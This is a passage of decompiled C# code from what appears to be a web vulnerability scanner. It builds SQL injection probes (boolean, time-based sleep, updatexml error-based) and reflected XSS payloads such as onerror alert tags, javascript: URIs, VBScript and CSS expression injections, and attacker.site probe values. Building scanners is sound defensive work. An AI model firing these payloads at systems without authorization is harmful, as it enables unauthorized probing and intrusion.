						errorBasedSQLInjectionVuln = GetBooleanBasedSQLInjectionVuln(text7, testReqType, injType, text9, testEscapeSpace, text3, sourceCode, refPage, text10, text11, injMethod, _DatabaseType, needSource1EqualToSource0: true, enctype);
						if (errorBasedSQLInjectionVuln != null)
						{
							flag = true;
							list.Add(errorBasedSQLInjectionVuln);
						}
						if (!flag && IsPotentialUserName(text3))
						{
							text7 = text + text8 + text5 + text3 + "=admin";
							errorBasedSQLInjectionVuln = GetBooleanBasedSQLInjectionVuln(text7, testReqType, injType, text9, testEscapeSpace, text3, sourceCode, refPage, text10, "--%20", injMethod, _DatabaseType, needSource1EqualToSource0: false, enctype);
							if (errorBasedSQLInjectionVuln != null)
							{
								flag = true;
								list.Add(errorBasedSQLInjectionVuln);
							}
						}
						if (!flag)
						{
							text7 = text + text8 + text5 + text3 + "=99999999";
							text9 = "oR";
							errorBasedSQLInjectionVuln = GetBooleanBasedSQLInjectionVuln(text7, ReqType, injType, text9, testEscapeSpace, text3, sourceCode, refPage, text10, text11, injMethod, _DatabaseType, needSource1EqualToSource0: false, enctype);
							if (errorBasedSQLInjectionVuln != null)
							{
								flag = true;
								list.Add(errorBasedSQLInjectionVuln);
							}
							else
							{
								errorBasedSQLInjectionVuln = GetBooleanBasedSQLInjectionVuln(text7, testReqType, injType, text9, testEscapeSpace, text3, sourceCode, refPage, text10, "--%20", injMethod, _DatabaseType, needSource1EqualToSource0: false, enctype);
								if (errorBasedSQLInjectionVuln != null)
								{
									flag = true;
									list.Add(errorBasedSQLInjectionVuln);
								}
								else if (ReqType == RequestType.GET && WCRSetting.ScanCookieSQL)
								{
									testReqType = RequestType.COOKIE;
									text9 = "aNd";
									text7 = text + text8 + text5 + "^" + array[j];
									errorBasedSQLInjectionVuln = GetBooleanBasedSQLInjectionVuln(text7, testReqType, injType, text9, testEscapeSpace, text3, sourceCode, refPage, text10, text11, injMethod, _DatabaseType, needSource1EqualToSource0: true, enctype);
									if (errorBasedSQLInjectionVuln != null)
									{
										flag = true;
										list.Add(errorBasedSQLInjectionVuln);
									}
									SetSingleCookie(sURL, text3 + "=1", "", EscapeCookie, isExpired: true);
								}
							}
						}
						if (flag)
						{
							break;
						}
					}
				}
				if (!flag)
				{
					testReqType = ReqType;
					text7 = text + text8 + text5 + text3 + "=";
					string[,] array5 = new string[2, 2]
					{
						{
							"%27 ",
							" aNd %27%25%27=%27"
						},
						{
							"%22 ",
							" aNd %22%25%22=%22"
						}
					};
					int length3 = array5.GetLength(0);
					for (int num3 = 0; num3 < length3; num3++)
					{
						text10 = array5[num3, 0];
						text9 = "oR";
						text11 = array5[num3, 1];
						injMethod = InjectMethod.ToBeDetect;
						injType = ParameterType.Search;
						errorBasedSQLInjectionVuln = GetBooleanBasedSQLInjectionVuln(text7, ReqType, injType, text9, testEscapeSpace, text3, sourceCode, refPage, text10, text11, injMethod, _DatabaseType, needSource1EqualToSource0: false, enctype);
						if (errorBasedSQLInjectionVuln != null)
						{
							flag = true;
							list.Add(errorBasedSQLInjectionVuln);
							break;
						}
					}
				}
				if (_DatabaseType == DBType.UnKnown || _DatabaseType == DBType.MySQL)
				{
					delegateLog("Checking SQL Injection, BooleanBased Rlike Blind, Parameter: " + text3);
					if (!text4.Contains("WCRTEXTAREATESTINPUT"))
					{
						flag = false;
						text10 = " RLIKE (case when ";
						text9 = "";
						text11 = " then 0x74657374696E70757476616C7565 else 0x28 end)";
						injMethod = InjectMethod.BooleanBased;
						injType = ParameterType.Integer;
						text7 = text + text8 + text5 + array[j];
						errorBasedSQLInjectionVuln = GetBooleanBasedSQLInjectionVuln(text7, ReqType, injType, text9, testEscapeSpace, text3, sourceCode, refPage, text10, text11, injMethod, DBType.MySQL, needSource1EqualToSource0: false, enctype);
						if (errorBasedSQLInjectionVuln != null)
						{
							flag = true;
							list.Add(errorBasedSQLInjectionVuln);
						}
					}
					if (!flag)
					{
						text10 = "%27 RLIKE (case when ";
						text9 = "";
						text11 = " then 0x74657374696E70757476616C7565 else 0x28 end) and '7917'='7917";
						injMethod = InjectMethod.BooleanBased;
						injType = ParameterType.String;
						text7 = text + text8 + text5 + array[j];
						errorBasedSQLInjectionVuln = GetBooleanBasedSQLInjectionVuln(text7, ReqType, injType, text9, testEscapeSpace, text3, sourceCode, refPage, text10, text11, injMethod, DBType.MySQL, needSource1EqualToSource0: false, enctype);
						if (errorBasedSQLInjectionVuln != null)
						{
							flag = true;
							list.Add(errorBasedSQLInjectionVuln);
						}
					}
					if (!flag)
					{
						text10 = "%27 RLIKE (case when ";
						text9 = "";
						text11 = " then 0x74657374696E70757476616C7565 else 0x28 end) and '%'='";
						injMethod = InjectMethod.BooleanBased;
						injType = ParameterType.Search;
						text7 = text + text8 + text5 + array[j];
						errorBasedSQLInjectionVuln = GetBooleanBasedSQLInjectionVuln(text7, ReqType, injType, text9, testEscapeSpace, text3, sourceCode, refPage, text10, text11, injMethod, DBType.MySQL, needSource1EqualToSource0: false, enctype);
						if (errorBasedSQLInjectionVuln != null)
						{
							flag = true;
							list.Add(errorBasedSQLInjectionVuln);
						}
					}
				}
				if (_DatabaseType != 0 && _DatabaseType != DBType.MySQL)
				{
					continue;
				}
				delegateLog("Checking SQL Injection, TimeBased, Parameter: " + text3);
				flag = false;
				text7 = text + text8 + text5 + array[j];
				injMethod = InjectMethod.TimeBased;
				injType = ParameterType.Integer;
				text10 = " ";
				text11 = ",sleep(3),0)";
				text9 = "aNd";
				errorBasedSQLInjectionVuln = GetTimeBasedSQLInjection(text7, ReqType, ParameterType.Integer, text9, testEscapeSpace, text3, refPage, text10, text11, testEscapeSpace, DBType.MySQL, enctype);
				if (errorBasedSQLInjectionVuln != null)
				{
					flag = true;
					list.Add(errorBasedSQLInjectionVuln);
					delegateLog("Found TimeBased SQL Injection Vuln: " + errorBasedSQLInjectionVuln.vulnPocUrlString);
				}
				else
				{
					text9 = "oR";
					errorBasedSQLInjectionVuln = GetTimeBasedSQLInjection(text7, ReqType, ParameterType.Integer, text9, testEscapeSpace, text3, refPage, text10, text11, testEscapeSpace, DBType.MySQL, enctype);
					if (errorBasedSQLInjectionVuln != null)
					{
						flag = true;
						list.Add(errorBasedSQLInjectionVuln);
						delegateLog("Found TimeBased SQL Injection Vuln: " + errorBasedSQLInjectionVuln.vulnPocUrlString);
					}
				}
				if (!flag)
				{
					text7 = text + text8 + text5 + array[j];
					injMethod = InjectMethod.TimeBased;
					injType = ParameterType.String;
					string[] array6 = new string[4]
					{
						"%27 ",
						"%27) ",
						"%22 ",
						"%22) "
					};
					string[] array7 = array6;
					foreach (string text12 in array7)
					{
						text10 = text12;
						text11 = ",sleep(3),0) --%20";
						text9 = "aNd";
						errorBasedSQLInjectionVuln = GetTimeBasedSQLInjection(text7, ReqType, ParameterType.String, text9, testEscapeSpace, text3, refPage, text10, text11, testEscapeSpace, DBType.MySQL, enctype);
						if (errorBasedSQLInjectionVuln != null)
						{
							flag = true;
							list.Add(errorBasedSQLInjectionVuln);
							delegateLog("Found TimeBased SQL Injection Vuln: " + errorBasedSQLInjectionVuln.vulnPocUrlString);
							break;
						}
						text9 = "oR";
						errorBasedSQLInjectionVuln = GetTimeBasedSQLInjection(text7, ReqType, ParameterType.String, text9, testEscapeSpace, text3, refPage, text10, text11, testEscapeSpace, DBType.MySQL, enctype);
						if (errorBasedSQLInjectionVuln != null)
						{
							flag = true;
							list.Add(errorBasedSQLInjectionVuln);
							delegateLog("Found TimeBased SQL Injection Vuln: " + errorBasedSQLInjectionVuln.vulnPocUrlString);
							break;
						}
					}
				}
				if (flag)
				{
					continue;
				}
				text7 = text + text8 + text5 + array[j];
				injMethod = InjectMethod.TimeBased;
				injType = ParameterType.String;
				string[,] array8 = new string[4, 2]
				{
					{
						"%27 ",
						",sleep(3),0) oR %27"
					},
					{
						"%27) ",
						",sleep(3),0) oR (%27"
					},
					{
						"%22 ",
						",sleep(3),0) oR %22"
					},
					{
						"%22) ",
						",sleep(3),0) oR (%22"
					}
				};
				int length4 = array8.GetLength(0);
				for (int num5 = 0; num5 < length4; num5++)
				{
					text10 = array8[num5, 0];
					text11 = array8[num5, 1];
					text9 = "aNd";
					errorBasedSQLInjectionVuln = GetTimeBasedSQLInjection(text7, ReqType, ParameterType.String, text9, testEscapeSpace, text3, refPage, text10, text11, testEscapeSpace, DBType.MySQL, enctype);
					if (errorBasedSQLInjectionVuln != null)
					{
						flag = true;
						list.Add(errorBasedSQLInjectionVuln);
						delegateLog("Found TimeBased SQL Injection Vuln: " + errorBasedSQLInjectionVuln.vulnPocUrlString);
						break;
					}
					text9 = "oR";
					errorBasedSQLInjectionVuln = GetTimeBasedSQLInjection(text7, ReqType, ParameterType.String, text9, testEscapeSpace, text3, refPage, text10, text11, testEscapeSpace, DBType.MySQL, enctype);
					if (errorBasedSQLInjectionVuln != null)
					{
						flag = true;
						list.Add(errorBasedSQLInjectionVuln);
						delegateLog("Found TimeBased SQL Injection Vuln: " + errorBasedSQLInjectionVuln.vulnPocUrlString);
						break;
					}
				}
			}
			if (_DatabaseType == DBType.UnKnown || _DatabaseType == DBType.MySQL)
			{
				string[,] array9 = new string[4, 2]
				{
					{
						"' oR updatexml(1,concat(0x5e,(",
						")),0) oR '"
					},
					{
						"') oR updatexml(1,concat(0x5e,(",
						")),0) oR ('"
					},
					{
						"\" oR updatexml(1,concat(0x5e,(",
						")),0) oR \""
					},
					{
						"\") oR updatexml(1,concat(0x5e,(",
						")),0) oR (\""
					}
				};
				int length5 = array9.GetLength(0);
				for (int num6 = 0; num6 < length5; num6++)
				{
					string prefix = array9[num6, 0];
					string postfix = array9[num6, 1];
					string regExpression2 = "(?<=\\x27\\x5E)[^\\x27]+(?=\\x27)";
					string value2 = ((Capture)Regex.Match(sURL, "(?<=[\\?\\^&])[^&]*(user|name|uid|userid)[^&]*(?=\\=\\d{7})", (RegexOptions)1)).get_Value();
					string testURL2 = Regex.Replace(sURL, value2 + "\\=\\d{7}", value2 + "=admin", (RegexOptions)1);
					VulnSQLInjection errorBasedSQLInjectionVuln2 = GetErrorBasedSQLInjectionVuln(ReqType, testURL2, ParameterType.String, refPage, "", testEscapeSpace, prefix, postfix, DBType.MySQL, regExpression2, 31, InjectMethod.ErrorBasedUserAgent, enctype);
					if (errorBasedSQLInjectionVuln2 != null)
					{
						list.Add(errorBasedSQLInjectionVuln2);
						break;
					}
					errorBasedSQLInjectionVuln2 = GetErrorBasedSQLInjectionVuln(ReqType, testURL2, ParameterType.String, refPage, "", testEscapeSpace, prefix, postfix, DBType.MySQL, regExpression2, 31, InjectMethod.ErrorBasedReferer, enctype);
					if (errorBasedSQLInjectionVuln2 != null)
					{
						list.Add(errorBasedSQLInjectionVuln2);
						break;
					}
				}
			}
			return list.ToArray();
		}

		public bool IsIncludeTargetScript(string source, string scriptStr)
		{
			if (source.IndexOf(scriptStr, StringComparison.OrdinalIgnoreCase) >= 0)
			{
				return true;
			}
			return false;
		}

		public VulnXSS[] GetXSSVulnCollection(string sURL, RequestType reqType, bool isSkipScanned, bool isDetectCsrf, WebForm webForm)
		{
			List<VulnXSS> list = new List<VulnXSS>();
			try
			{
				if (CurrentStatus == TaskStatus.Stop)
				{
					return list.ToArray();
				}
				if (Is404URL(sURL, "GetXSSVulnCollection"))
				{
					return list.ToArray();
				}
				string sourceCodeByReplaceCsrfCode = GetSourceCodeByReplaceCsrfCode(sURL, reqType, isDetectCsrf, webForm);
				string referUrl = sURL;
				if (webForm != null)
				{
					referUrl = webForm.refUrl;
				}
				string text = "?";
				string[] array;
				if (reqType == RequestType.GET)
				{
					array = sURL.Split(new char[1]
					{
						'?'
					});
				}
				else
				{
					array = sURL.Split(new char[1]
					{
						'^'
					});
					text = "^";
				}
				if (array.Length < 2)
				{
					return list.ToArray();
				}
				if (string.IsNullOrEmpty(array[1]))
				{
					return list.ToArray();
				}
				string[] array2 = array[1].Split(new char[1]
				{
					'&'
				});
				for (int i = 0; i < array2.Length; i++)
				{
					string[] array3 = array2[i].Split(new char[1]
					{
						'='
					});
					string text2 = array3[0];
					if (text2.IndexOf("csrf", StringComparison.OrdinalIgnoreCase) >= 0 || text2.IndexOf("token", StringComparison.OrdinalIgnoreCase) >= 0 || text2.IndexOf("session", StringComparison.OrdinalIgnoreCase) >= 0 || text2.IndexOf("submit", StringComparison.OrdinalIgnoreCase) >= 0)
					{
						continue;
					}
					string text3 = array3[1];
					string text4 = text3.Replace("\\", "\\\\").Replace(".", "\\.");
					string text5 = array[0];
					string text6 = "";
					for (int j = 0; j < i; j++)
					{
						if (!string.IsNullOrEmpty(text6))
						{
							text6 += "&";
						}
						text6 += array2[j];
					}
					for (int k = i + 1; k < array2.Length; k++)
					{
						if (!string.IsNullOrEmpty(text6))
						{
							text6 += "&";
						}
						text6 += array2[k];
					}
					string text7 = URL2NoParaURL(sURL) + "^" + text2.ToLower() + "^XSS";
					if (isSkipScanned && IsScannedParameter(text7))
					{
						continue;
					}
					AddScannedParameter(text7);
					if (!string.IsNullOrEmpty(text6))
					{
						text6 += "&";
					}
					string text8 = "";
					string text9 = "";
					string text10 = "";
					string text11 = "";
					string text12 = "";
					if (string.IsNullOrEmpty(text3))
					{
						text3 = GenerateRandomIntegerString();
						text11 = text5 + text + text6 + text2 + "=" + text3;
						sourceCodeByReplaceCsrfCode = GetSourceCodeByReplaceCsrfCode(text11, reqType, isDetectCsrf, webForm);
					}
					if (sourceCodeByReplaceCsrfCode.IndexOf(text3, StringComparison.OrdinalIgnoreCase) < 0)
					{
						text8 = GenerateRandomIntegerString();
						text9 = "'<img src=0 onerror=\"alert(" + text8 + ")\">";
						text10 = "<img src=0 onerror=\"alert(" + text8 + ")\">";
						text11 = text5 + text + text6 + array2[i] + text9;
						text12 = GetSourceCodeByReplaceCsrfCode(text11, reqType, isDetectCsrf, webForm);
						if (IsIncludeTargetScript(text12, text10))
						{
							VulnXSS vulnXSS = new VulnXSS(reqType, referUrl, text11, text2, XSSType.InException, reqType.ToString() + " XSS Reflected", EscapeCookie);
							list.Add(vulnXSS);
							delegateLog("Found XSS Vuln: " + vulnXSS.vulnActionUrl);
							continue;
						}
						if (reqType == RequestType.GET)
						{
							text8 = GenerateRandomIntegerString();
							text9 = "<img src=0 onerror='alert(" + text8 + ")'>";
							text10 = text9;
							text11 = text5 + text + text6 + array2[i] + text9;
							text12 = GetSourceCodeByReplaceCsrfCode(text11, RequestType.POST, isDetectCsrf, webForm);
							if (IsIncludeTargetScript(text12, text10))
							{
								VulnXSS vulnXSS2 = new VulnXSS(RequestType.POST, referUrl, text11, text2, XSSType.InHTML, "POST XSS Reflected", EscapeCookie);
								list.Add(vulnXSS2);
								delegateLog("Found XSS Vuln: " + vulnXSS2.vulnActionUrl);
								continue;
							}
							text8 = GenerateRandomIntegerString();
							text9 = "<img src=0 onerror='alert(" + text8 + ")'>";
							text10 = text9;
							text11 = text5 + text + text6 + array2[i] + "^" + array2[i] + text9;
							text12 = GetSourceCodeWithCookieOption(text11, RequestType.COOKIE, escapeCookie: false);
							if (IsIncludeTargetScript(text12, text10))
							{
								VulnXSS vulnXSS3 = new VulnXSS(RequestType.COOKIE, referUrl, text11, text2, XSSType.InCookie, "Cookie XSS Reflected", escapeCookie: false);
								list.Add(vulnXSS3);
								delegateLog("Found XSS Vuln: " + vulnXSS3.vulnActionUrl);
								SetSingleCookie(sURL, array2[i], "", EscapeCookie, isExpired: true);
								continue;
							}
							text12 = GetSourceCodeWithCookieOption(text11, RequestType.COOKIE, escapeCookie: true);
							if (IsIncludeTargetScript(text12, text10))
							{
								VulnXSS vulnXSS4 = new VulnXSS(RequestType.COOKIE, referUrl, text11, text2, XSSType.InCookie, "Cookie XSS Reflected", escapeCookie: true);
								list.Add(vulnXSS4);
								delegateLog("Found XSS Vuln: " + vulnXSS4.vulnActionUrl);
								SetSingleCookie(sURL, array2[i], "", EscapeCookie, isExpired: true);
								continue;
							}
							SetSingleCookie(sURL, array2[i], "", EscapeCookie, isExpired: true);
						}
						else
						{
							text8 = GenerateRandomIntegerString();
							text9 = "<img src=0 onerror='alert(" + text8 + ")'>";
							text10 = text9;
							text11 = text5 + "?" + text6 + array2[i] + text9;
							text12 = GetSourceCodeByReplaceCsrfCode(text11, RequestType.GET, isDetectCsrf, webForm);
							if (IsIncludeTargetScript(text12, text10))
							{
								VulnXSS vulnXSS5 = new VulnXSS(RequestType.GET, referUrl, text11, text2, XSSType.InHTML, "GET XSS Reflected", EscapeCookie);
								list.Add(vulnXSS5);
								delegateLog("Found XSS Vuln: " + vulnXSS5.vulnActionUrl);
								continue;
							}
						}
					}
					else if (Regex.IsMatch(sourceCodeByReplaceCsrfCode, "(?<=<textarea>((?!</textarea>).)*)" + text4, (RegexOptions)1))
					{
						text8 = GenerateRandomIntegerString();
						text9 = "</textarea><img src=0 onerror=\"alert(" + text8 + ")\">";
						text10 = text9;
						text11 = text5 + text + text6 + array2[i] + text9;
						text12 = GetSourceCodeByReplaceCsrfCode(text11, reqType, isDetectCsrf, webForm);
						if (IsIncludeTargetScript(text12, text10))
						{
							VulnXSS vulnXSS6 = new VulnXSS(reqType, referUrl, text11, text2, XSSType.InTextArea, reqType.ToString() + " XSS Reflected", EscapeCookie);
							list.Add(vulnXSS6);
							delegateLog("Found XSS Vuln: " + vulnXSS6.vulnActionUrl);
							continue;
						}
					}
					else if (Regex.IsMatch(sourceCodeByReplaceCsrfCode, "(?<=(<script\\s+language\\=[\\x22\\x27]?VBScript[\\x22\\x27]?.*?>|VBScript:)[^>]+)" + text4 + "[\\x22\\x27]?", (RegexOptions)1))
					{
						string text13 = "";
						if (Regex.IsMatch(sourceCodeByReplaceCsrfCode, "(?<=Document\\.Write[^\\)]+)" + text4 + "[\\x22\\x27]?\\s*\\)", (RegexOptions)1))
						{
							text13 = ((Capture)Regex.Match(sourceCodeByReplaceCsrfCode, "(?<=Document\\.Write[^\\)]+)" + text4 + "[\\x22\\x27]?\\s*\\)", (RegexOptions)1)).get_Value();
							string text14 = "";
							if (text13.IndexOf("'") > 0)
							{
								text14 = "'";
							}
							else if (text13.IndexOf("\"") > 0)
							{
								text14 = "\"";
							}
							text8 = GenerateRandomIntegerString();
							if (string.IsNullOrEmpty(text14))
							{
								text9 = "MsgBox(document.domain)";
								text10 = text9;
								text11 = text5 + text + text6 + text2 + "=" + text9;
							}
							else
							{
								text9 = text14 + " %26 MsgBox(" + text14 + text8 + text14 + ") %26 " + text14 + "aa";
								text10 = text9.Replace("%26", "&");
								text11 = text5 + text + text6 + array2[i] + text9;
							}
							text12 = GetSourceCodeByReplaceCsrfCode(text11, reqType, isDetectCsrf, webForm);
							if (IsIncludeTargetScript(text12, text10))
							{
								VulnXSS vulnXSS7 = new VulnXSS(reqType, referUrl, text11, text2, XSSType.InVBScriptOldIE, reqType.ToString() + " XSS Reflected", EscapeCookie);
								list.Add(vulnXSS7);
								delegateLog("Found XSS Vuln: " + vulnXSS7.vulnActionUrl);
								continue;
							}
						}
						text13 = ((Capture)Regex.Match(sourceCodeByReplaceCsrfCode, "(?<=(<script\\s+language\\=[\\x22\\x27]?VBScript[\\x22\\x27]?.*?>|VBScript:)[^>]+)" + text4 + "[\\x22\\x27]?", (RegexOptions)1)).get_Value();
						string text15 = "";
						if (text13.Length == text3.Length + 1)
						{
							text15 = text13.Substring(text13.Length - 1);
						}
						text8 = GenerateRandomIntegerString();
						text9 = text15 + "%0d%0aMsgBox " + text15 + text8 + text15 + "%0d%0arem aa";
						text10 = text9.Replace("%0d%0a", "\r\n");
						text11 = text5 + text + text6 + array2[i] + text9;
						text12 = GetSourceCodeByReplaceCsrfCode(text11, reqType, isDetectCsrf, webForm);
						if (IsIncludeTargetScript(text12, text10))
						{
							VulnXSS vulnXSS8 = new VulnXSS(reqType, referUrl, text11, text2, XSSType.InVBScriptOldIE, reqType.ToString() + " XSS Reflected", EscapeCookie);
							list.Add(vulnXSS8);
							delegateLog("Found XSS Vuln: " + vulnXSS8.vulnActionUrl);
							continue;
						}
					}
					else if (Regex.IsMatch(sourceCodeByReplaceCsrfCode, "(?<=<script\\s[^>]+)" + text4 + "[\\x22\\x27]?", (RegexOptions)1))
					{
						if (Regex.IsMatch(sourceCodeByReplaceCsrfCode, "(?<=src\\s*\\=\\s*[\\x22\\x27]?)" + text4, (RegexOptions)1))
						{
							text8 = GenerateRandomIntegerString();
							text9 = "attacker.site/new" + text8;
							text10 = text9;
							text11 = text5 + text + text6 + text2 + "=" + text9;
							text12 = GetSourceCodeByReplaceCsrfCode(text11, reqType, isDetectCsrf, webForm);
							if (IsIncludeTargetScript(text12, text10))
							{
								VulnXSS vulnXSS9 = new VulnXSS(reqType, referUrl, text11, text2, XSSType.InScriptSrc, reqType.ToString() + " XSS Reflected", EscapeCookie);
								list.Add(vulnXSS9);
								delegateLog("Found XSS Vuln: " + vulnXSS9.vulnActionUrl);
								continue;
							}
						}
						string value = ((Capture)Regex.Match(sourceCodeByReplaceCsrfCode, "(?<=<script\\s[^>]+)" + text4 + "[\\x22\\x27]?", (RegexOptions)1)).get_Value();
						string text16 = "";
						if (value.Length == text3.Length + 1)
						{
							text16 = value.Substring(value.Length - 1);
						}
						text9 = text16 + " src=" + text16 + "exp.js";
						text10 = text9 + text16;
						text11 = text5 + text + text6 + array2[i] + text9;
						text12 = GetSourceCodeByReplaceCsrfCode(text11, reqType, isDetectCsrf, webForm);
						if (IsIncludeTargetScript(text12, text10))
						{
							VulnXSS vulnXSS10 = new VulnXSS(reqType, referUrl, text11, text2, XSSType.InScriptTag, reqType.ToString() + " XSS Reflected", EscapeCookie);
							list.Add(vulnXSS10);
							delegateLog("Found XSS Vuln: " + vulnXSS10.vulnActionUrl);
							continue;
						}
					}
					else if (Regex.IsMatch(sourceCodeByReplaceCsrfCode, "(?<=(onclick|onload|onerror|onmouse|onfocus|onsubmit|onselect|javascript:|<script.*>)[^>]+)" + text4 + "[\\x22\\x27]?", (RegexOptions)1))
					{
						if (Regex.IsMatch(sourceCodeByReplaceCsrfCode, "(?<=(//|/\\*).+)" + text4 + "[\\x22\\x27]?", (RegexOptions)1))
						{
							string value2 = ((Capture)Regex.Match(sourceCodeByReplaceCsrfCode, "(//|/\\*).*?" + text4 + "[\\x22\\x27]?", (RegexOptions)1)).get_Value();
							string text17 = value2.Substring(0, 2);
							text8 = GenerateRandomIntegerString();
							if (text17.Equals("//"))
							{
								text9 = ";%0d%0aalert(" + text8 + ");//";
								text10 = text9.Replace("%0d%0a", "\r\n");
								text11 = text5 + text + text6 + array2[i] + text9;
							}
							else
							{
								text9 = ";*/%0d%0aalert(" + text8 + ");/*";
								text10 = text9.Replace("%0d%0a", "\r\n");
								text11 = text5 + text + text6 + array2[i] + text9;
							}
							text12 = GetSourceCodeByReplaceCsrfCode(text11, reqType, isDetectCsrf, webForm);
							if (IsIncludeTargetScript(text12, text10))
							{
								VulnXSS vulnXSS11 = new VulnXSS(reqType, referUrl, text11, text2, XSSType.InScriptComment, reqType.ToString() + " XSS Reflected", EscapeCookie);
								list.Add(vulnXSS11);
								delegateLog("Found XSS Vuln: " + vulnXSS11.vulnActionUrl);
								continue;
							}
						}
						string value3 = ((Capture)Regex.Match(sourceCodeByReplaceCsrfCode, "(?<=(onclick|onload|onerror|onmouse|onfocus|onsubmit|onselect|javascript:|<script.*>)[^>]+)" + text4 + "[\\x22\\x27]?", (RegexOptions)1)).get_Value();
						string text18 = "";
						if (value3.Length == text3.Length + 1)
						{
							text18 = value3.Substring(value3.Length - 1);
						}
						text8 = GenerateRandomIntegerString();
						text9 = text18 + ";alert(" + text8 + ");//";
						text10 = text9 + text18;
						text11 = text5 + text + text6 + array2[i] + text9;
						text12 = GetSourceCodeByReplaceCsrfCode(text11, reqType, isDetectCsrf, webForm);
						if (IsIncludeTargetScript(text12, text10))
						{
							VulnXSS vulnXSS12 = new VulnXSS(reqType, referUrl, text11, text2, XSSType.InScript, reqType.ToString() + " XSS Reflected", EscapeCookie);
							list.Add(vulnXSS12);
							delegateLog("Found XSS Vuln: " + vulnXSS12.vulnActionUrl);
							continue;
						}
						text8 = GenerateRandomIntegerString();
						text9 = "javascript:alert(" + text8 + ")";
						text10 = text9;
						text11 = text5 + text + text6 + text2 + "=" + text9;
						text12 = GetSourceCodeByReplaceCsrfCode(text11, reqType, isDetectCsrf, webForm);
						if (IsIncludeTargetScript(text12, text10))
						{
							VulnXSS vulnXSS13 = new VulnXSS(reqType, referUrl, text11, text2, XSSType.InScript, reqType.ToString() + " XSS Reflected", EscapeCookie);
							list.Add(vulnXSS13);
							delegateLog("Found XSS Vuln: " + vulnXSS13.vulnActionUrl);
							continue;
						}
					}
					else if (Regex.IsMatch(sourceCodeByReplaceCsrfCode, "(?<=<\\w+[^>]+)" + text4 + "[\\x22\\x27\\s]", (RegexOptions)1))
					{
						string value4 = ((Capture)Regex.Match(sourceCodeByReplaceCsrfCode, "(?<=<\\w+[^>]+)" + text4 + "[\\x22\\x27\\s]", (RegexOptions)1)).get_Value();
						string text19 = "";
						if (value4.Length == text3.Length + 1)
						{
							text19 = value4.Substring(value4.Length - 1);
						}
						text8 = GenerateRandomIntegerString();
						text9 = text19 + " onmouseover=" + text19 + "alert(" + text8 + ")";
						text10 = text9 + text19;
						text11 = text5 + text + text6 + array2[i] + text9;
						text12 = GetSourceCodeByReplaceCsrfCode(text11, reqType, isDetectCsrf, webForm);
						if (IsIncludeTargetScript(text12, text10))
						{
							VulnXSS vulnXSS14 = new VulnXSS(reqType, referUrl, text11, text2, XSSType.InlineTag, reqType.ToString() + " XSS Reflected", EscapeCookie);
							list.Add(vulnXSS14);
							delegateLog("Found XSS Vuln: " + vulnXSS14.vulnActionUrl);
							continue;
						}
						if (Regex.IsMatch(sourceCodeByReplaceCsrfCode, "(?<=src\\s*\\=\\s*[\\x22\\x27]?)" + text4, (RegexOptions)1))
						{
							text8 = GenerateRandomIntegerString();
							text9 = "javascript:alert(" + text8 + ")";
							text10 = text9;
							text11 = text5 + text + text6 + text2 + "=" + text9;
							text12 = GetSourceCodeByReplaceCsrfCode(text11, reqType, isDetectCsrf, webForm);
							if (IsIncludeTargetScript(text12, text10))
							{
								VulnXSS vulnXSS15 = new VulnXSS(reqType, referUrl, text11, text2, XSSType.InLineSrc, reqType.ToString() + " XSS Reflected", EscapeCookie);
								list.Add(vulnXSS15);
								delegateLog("Found XSS Vuln: " + vulnXSS15.vulnActionUrl);
								continue;
							}
						}
						if (Regex.IsMatch(sourceCodeByReplaceCsrfCode, "(?<=(action|href)\\s*\\=\\s*[\\x22\\x27]?)" + text4, (RegexOptions)1))
						{
							text8 = GenerateRandomIntegerString();
							text9 = "attacker.site/savepwd" + text8;
							text10 = text9;
							text11 = text5 + text + text6 + text2 + "=" + text9;
							text12 = GetSourceCodeByReplaceCsrfCode(text11, reqType, isDetectCsrf, webForm);
							if (IsIncludeTargetScript(text12, text10))
							{
								VulnXSS vulnXSS16 = new VulnXSS(reqType, referUrl, text11, text2, XSSType.InAddress, reqType.ToString() + " XSS Reflected", EscapeCookie);
								list.Add(vulnXSS16);
								delegateLog("Found XSS Vuln: " + vulnXSS16.vulnActionUrl);
								continue;
							}
						}
					}
					else if (Regex.IsMatch(sourceCodeByReplaceCsrfCode, "(?<=<\\!\\-\\-[^>]*)" + text4, (RegexOptions)1))
					{
						text8 = GenerateRandomIntegerString();
						text9 = "--><img src=0 onerror=\"alert(" + text8 + ")\">";
						text10 = text9;
						text11 = text5 + text + text6 + array2[i] + text9;
						text12 = GetSourceCodeByReplaceCsrfCode(text11, reqType, isDetectCsrf, webForm);
						if (IsIncludeTargetScript(text12, text10))
						{
							VulnXSS vulnXSS17 = new VulnXSS(reqType, referUrl, text11, text2, XSSType.InHTMLComment, reqType.ToString() + " XSS Reflected", EscapeCookie);
							list.Add(vulnXSS17);
							delegateLog("Found XSS Vuln: " + vulnXSS17.vulnActionUrl);
							continue;
						}
					}
					else if (Regex.IsMatch(sourceCodeByReplaceCsrfCode, "(?<=<style>[^>]*)" + text4, (RegexOptions)1))
					{
						if (Regex.IsMatch(sourceCodeByReplaceCsrfCode, text4 + "(?=\\s+\\{)", (RegexOptions)1))
						{
							text8 = GenerateRandomIntegerString();
							text9 = "body {width: expression(alert(" + text8 + "))} ";
							text10 = text9;
							text11 = text5 + text + text6 + text2 + "=" + text9 + text3;
							text12 = GetSourceCodeByReplaceCsrfCode(text11, reqType, isDetectCsrf, webForm);
							if (IsIncludeTargetScript(text12, text10))
							{
								VulnXSS vulnXSS18 = new VulnXSS(reqType, referUrl, text11, text2, XSSType.InStyleSelector, reqType.ToString() + " XSS Reflected", EscapeCookie);
								list.Add(vulnXSS18);
								delegateLog("Found XSS Vuln: " + vulnXSS18.vulnActionUrl);
								continue;
							}
						}
						if (Regex.IsMatch(sourceCodeByReplaceCsrfCode, "(?<=\\[[^\\]]*)" + text4, (RegexOptions)1))
						{
							text8 = GenerateRandomIntegerString();
							text9 = "=aa] {aa:aa} body {width:expression('alert(" + text8 + ")')} aa[aa";
							text10 = text9;
							text11 = text5 + text + text6 + array2[i] + text9;
							text12 = GetSourceCodeByReplaceCsrfCode(text11, reqType, isDetectCsrf, webForm);
							if (IsIncludeTargetScript(text12, text10))
							{
								VulnXSS vulnXSS19 = new VulnXSS(reqType, referUrl, text11, text2, XSSType.InStyleAttribute, reqType.ToString() + " XSS Reflected", EscapeCookie);
								list.Add(vulnXSS19);
								delegateLog("Found XSS Vuln: " + vulnXSS19.vulnActionUrl);
								continue;
							}
						}
						if (Regex.IsMatch(sourceCodeByReplaceCsrfCode, "(?<=\\{[^\\}]*)" + text4 + "(?=[:\\s])", (RegexOptions)1))
						{
							text8 = GenerateRandomIntegerString();
							text9 = "width:expression('alert(" + text8 + ")'); ";
							text10 = text9;
